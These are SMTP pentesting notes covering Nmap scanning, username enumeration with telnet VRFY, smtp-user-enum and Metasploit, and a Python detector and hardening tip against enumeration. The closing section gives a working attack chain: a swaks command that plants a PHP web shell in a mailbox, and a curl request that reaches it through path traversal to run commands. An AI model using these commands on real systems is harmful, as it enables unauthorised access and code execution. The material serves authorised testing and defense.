
25 - Pentesting SMTP

Nmap

nmap -p 25 -sV -sC -Pn 192.168.0.102
...
25/tcp    open  smtp    Postfix smtpd
...

Enumeration - Telnet

> telnet 10.0.2.5 25

> VRFY root
< 252 2.0.0 root

> VRFY szalek
< 550 5.1.1 <szalek>: Recipient address rejected: User unknown in local recipient table

> VRFY admin
< 550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table

> VRFY user
< 252 2.0.0 user

Enumeration - smtp-user-enum

smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t "$target"
smtp-user-enum -M EXPN -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t "$target"
smtp-user-enum -M RCPT -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t "$target"

Enumeration - Metasploit

use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) > set rhosts 10.10.200.211
msf auxiliary(smtp_enum) > set rport 25
msf auxiliary(smtp_enum) > set USER_FILE /tmp/users.txt
msf auxiliary(smtp_enum) > run
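
Every VRFY or RCPT guess that misses, as in the 550 5.1.1 responses above, leaves a reject entry in the Postfix mail log, so counting distinct unknown recipients per client IP flags the enumeration. This is an added example, not part of the original notes: the log lines are constructed in the shape of Postfix smtpd reject entries, and the function name and threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample lines, shaped like Postfix smtpd log entries.
SAMPLE_LOG = """\
Jan 10 10:00:00 mail postfix/smtpd[2211]: connect from unknown[10.0.2.15]
Jan 10 10:00:01 mail postfix/smtpd[2211]: NOQUEUE: reject: VRFY from unknown[10.0.2.15]: 550 5.1.1 <szalek>: Recipient address rejected: User unknown in local recipient table; to=<szalek> proto=SMTP
Jan 10 10:00:02 mail postfix/smtpd[2211]: NOQUEUE: reject: VRFY from unknown[10.0.2.15]: 550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table; to=<admin> proto=SMTP
Jan 10 10:00:03 mail postfix/smtpd[2211]: NOQUEUE: reject: RCPT from unknown[10.0.2.15]: 550 5.1.1 <guest@localhost>: Recipient address rejected: User unknown in local recipient table; from=<a@b.test> to=<guest@localhost> proto=SMTP helo=<x>
Jan 10 10:05:00 mail postfix/smtpd[2300]: NOQUEUE: reject: RCPT from mx.example.org[192.168.0.50]: 550 5.1.1 <jon@localhost>: Recipient address rejected: User unknown in local recipient table; from=<c@example.org> to=<jon@localhost> proto=ESMTP helo=<mx.example.org>
Jan 10 10:06:00 mail postfix/smtpd[2211]: NOQUEUE: reject: VRFY from unknown[10.0.2.15]: 550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table; to=<admin> proto=SMTP
"""

# Matches only "user unknown" rejects for the two commands used for guessing.
REJECT_RE = re.compile(
    r"reject: (?P<cmd>VRFY|RCPT) from \S*\[(?P<ip>[^\]]+)\]: "
    r"550 5\.1\.1 <(?P<rcpt>[^>]*)>: Recipient address rejected: User unknown"
)


def find_enumerators(log_text, threshold=3):
    """Return {client_ip: sorted distinct unknown recipients} for clients
    that probed at least `threshold` different nonexistent recipients.
    The threshold is an assumed starting value; tune it to local traffic."""
    probes = defaultdict(set)
    for line in log_text.splitlines():
        m = REJECT_RE.search(line)
        if m:
            # A set de-duplicates repeated guesses for the same name.
            probes[m.group("ip")].add(m.group("rcpt").lower())
    return {
        ip: sorted(names)
        for ip, names in probes.items()
        if len(names) >= threshold
    }


if __name__ == "__main__":
    for ip, names in find_enumerators(SAMPLE_LOG).items():
        print(f"{ip}: {len(names)} unknown recipients probed: {', '.join(names)}")
```

Setting disable_vrfy_command = yes in the Postfix main.cf closes the VRFY path; RCPT guessing still shows up in this count.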

Executing command

Send email

swaks --to asterisk@localhost --from admin@vtiger.htb --header "EmailHacked" --body 'BodyStart <?php system($_REQUEST["cmd"]); ?> BodyEnd' --server "$target"

Execute

curl -k 'https://10.129.84.70/file.php?file=../../../../../../../..//var/mail/UserName%00&cmd=id'